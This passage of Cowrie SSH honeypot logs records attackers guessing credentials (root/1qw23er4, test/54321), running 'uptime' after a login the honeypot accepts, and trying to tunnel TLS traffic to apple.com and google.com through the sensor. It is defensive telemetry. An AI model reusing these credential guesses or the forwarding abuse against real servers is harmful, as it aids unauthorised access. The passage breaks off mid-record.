{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x8c_\\xc83\\xc4\\xe6\\xb2\\xfb\\xa0\\xcb\\xe6\\xdc\\xda?\\xc2\\x11F\\xf7\\xee\\x9e\\xe3\\xf1x\\xb0\\xdc\\x85\\xdbph\\x03'\\x9e \\xdc\\xe1$\\x0f\\x1c\\x1a\\xa6\\xeb\\x08\\x1a\\x1e\\xf2slc\\xce\\x8fxMQC\\xd1\\x19_\\x081\\xb5\\x1c\\xdb\\x8f\\xd4,\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa4\\xc4\\x83\\x12.3\\x08\\x843\\xaa\\x00\\xddg\\xaf\\x98\\xdf\\xc1\\x9a\\xb2%\\xc5D\\xdc\\x9c\\x89w\\x82\\xae`\\x91\\x1e9\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x8c_\\xc83\\xc4\\xe6\\xb2\\xfb\\xa0\\xcb\\xe6\\xdc\\xda?\\xc2\\x11F\\xf7\\xee\\x9e\\xe3\\xf1x\\xb0\\xdc\\x85\\xdbph\\x03'\\x9e \\xdc\\xe1$\\x0f\\x1c\\x1a\\xa6\\xeb\\x08\\x1a\\x1e\\xf2slc\\xce\\x8fxMQC\\xd1\\x19_\\x081\\xb5\\x1c\\xdb\\x8f\\xd4,\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa4\\xc4\\x83\\x12.3\\x08\\x843\\xaa\\x00\\xddg\\xaf\\x98\\xdf\\xc1\\x9a\\xb2%\\xc5D\\xdc\\x9c\\x89w\\x82\\xae`\\x91\\x1e9\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.341907Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.186.196","dst_port":443,"src_ip":"194.0.234.21","src_port":53988,"message":"direct-tcp connection request to 142.250.186.196:443 from 127.0.0.1:53988","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.407531Z","session":"e083a6744c38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.186.196","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x8c*[_\\x02%\\xdd\\x0b|\\x02\\x97\\xdf\\xed\\x02\\x029|\\xceP7\\xd7\\xcd\\xe8-G&|\\x82\\xe8d\\xbc) \\x11\\xa6L<ZH\\x80\\xbe|\\xfec\\xd1;U9\\xf0\\xa1\\xc2\\xd7R4F8cFsc\\xdb\\xc1+a(\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa8Gk7\\xc8\\xc3\\xadb\\x90\\xfb\\x9e\\x00\\xbf&\\xc4r\\xc1\\x9f\\xa7\\xaa\\x14\\xce\\x99|\\x93`\\x92 I\\xaak2\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.186.196:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x8c*[_\\x02%\\xdd\\x0b|\\x02\\x97\\xdf\\xed\\x02\\x029|\\xceP7\\xd7\\xcd\\xe8-G&|\\x82\\xe8d\\xbc) \\x11\\xa6L<ZH\\x80\\xbe|\\xfec\\xd1;U9\\xf0\\xa1\\xc2\\xd7R4F8cFsc\\xdb\\xc1+a(\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa8Gk7\\xc8\\xc3\\xadb\\x90\\xfb\\x9e\\x00\\xbf&\\xc4r\\xc1\\x9f\\xa7\\xaa\\x14\\xce\\x99|\\x93`\\x92 I\\xaak2\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.443216Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:38:48.480528Z","src_ip":"194.0.234.21","session":"e083a6744c38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57312,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ec8210dc733","protocol":"ssh","message":"New connection: 212.227.235.229:57312 (1.2.3.4:22) [session: 1ec8210dc733]","sensor":"my-vps","timestamp":"2025-08-26T23:39:02.699259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:39:03.888890Z","src_ip":"212.227.235.229","session":"1ec8210dc733"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:39:03.890268Z","src_ip":"212.227.235.229","session":"1ec8210dc733"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":54980,"dst_ip":"1.2.3.4","dst_port":22,"session":"f34e3f360fdd","protocol":"ssh","message":"New connection: 213.108.243.7:54980 (1.2.3.4:22) [session: f34e3f360fdd]","sensor":"my-vps","timestamp":"2025-08-26T23:39:04.947400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:39:04.948183Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T23:39:05.042122Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.login.success","username":"root","password":"1qw23er4","message":"login attempt [root/1qw23er4] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:39:05.318427Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:39:05.544238Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-26T23:39:05.545080Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:39:05.638803Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:39:05.640005Z","src_ip":"213.108.243.7","session":"f34e3f360fdd"}
{"eventid":"cowrie.login.failed","username":"test","password":"54321","message":"login attempt [test/54321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:39:08.749429Z","src_ip":"212.227.235.229","session":"1ec8210dc733"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:39:10.712880Z","src_ip":"212.227.235.229","session":"1ec8210dc733"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42884,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e74520c6dde","protocol":"ssh","message":"New connection: 212.227.235.229:42884 (1.2.3.4:22) [session: 8e74520c6dde]","sensor":"my-vps","timestamp":"2025-08-26T23:39:21.446189Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x8b\u0550\\xdbn\u0010\u0018\\xbcv\\xa8\u001b\\xa7\u000b+\\x9a\u001c\\xca\u001d'K\\x84gdY\u00158#zx^\b\\xd6\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x8b\u0550\\xdbn\u0010\u0018\\xbcv\\xa8\u001b\\xa7\u000b+\\x9a\u001c\\xca\u001d'K\\x84gdY\u00158#zx^\b\\xd6\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T23:39:21.447411Z","src_ip":"212.227.235.229","session":"8e74520c6dde"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:39:21.448172Z","src_ip":"212.227.235.229","session":"8e74520c6dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58180,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8f59c47375c","protocol":"ssh","message":"New connection: 212.227.125.160:58180 (1.2.3.4:22) [session: e8f59c47375c]","sensor":"my-vps","timestamp":"2025-08-26T23:39:34.217763Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003I\u0001\\xa3\\xe9mu\u000fgW\\xb9v\\xed\\xd1i.\u001dI\\xe2\\xafJ\\xb4\\x8d\u0015\\x838m\\xee V\\xb8\\x82\\xd4\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003I\u0001\\xa3\\xe9mu\u000fgW\\xb9v\\xed\\xd1i.\u001dI\\xe2\\xafJ\\xb4\\x8d\u0015\\x838m\\xee V\\xb8\\x82\\xd4\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-26T23:39:34.218788Z","src_ip":"212.227.125.160","session":"e8f59c47375c"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:39:34.219807Z","src_ip":"212.227.125.160","session":"e8f59c47375c"}
{"eventid":"cowrie.session.connect","src_ip":"3.134.148.59","src_port":48014,"dst_ip":"1.2.3.4","dst_port":22,"session":"f36380891fbe","protocol":"ssh","message":"New connection: 3.134.148.59:48014 (1.2.3.4:22) [session: f36380891fbe]","sensor":"my-vps","timestamp":"2025-08-26T23:39:50.614857Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T23:39:50.622227Z","src_ip":"3.134.148.59","session":"f36380891fbe"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:39:50.623146Z","src_ip":"3.134.148.59","session":"f36380891fbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45216,"dst_ip":"1.2.3.4","dst_port":22,"session":"43e24c08c934","protocol":"ssh","message":"New connection: 212.227.235.229:45216 (1.2.3.4:22) [session: 43e24c08c934]","sensor":"my-vps","timestamp":"2025-08-26T23:40:25.350404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T23:40:25.351717Z","src_ip":"212.227.235.229","session":"43e24c08c934"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH 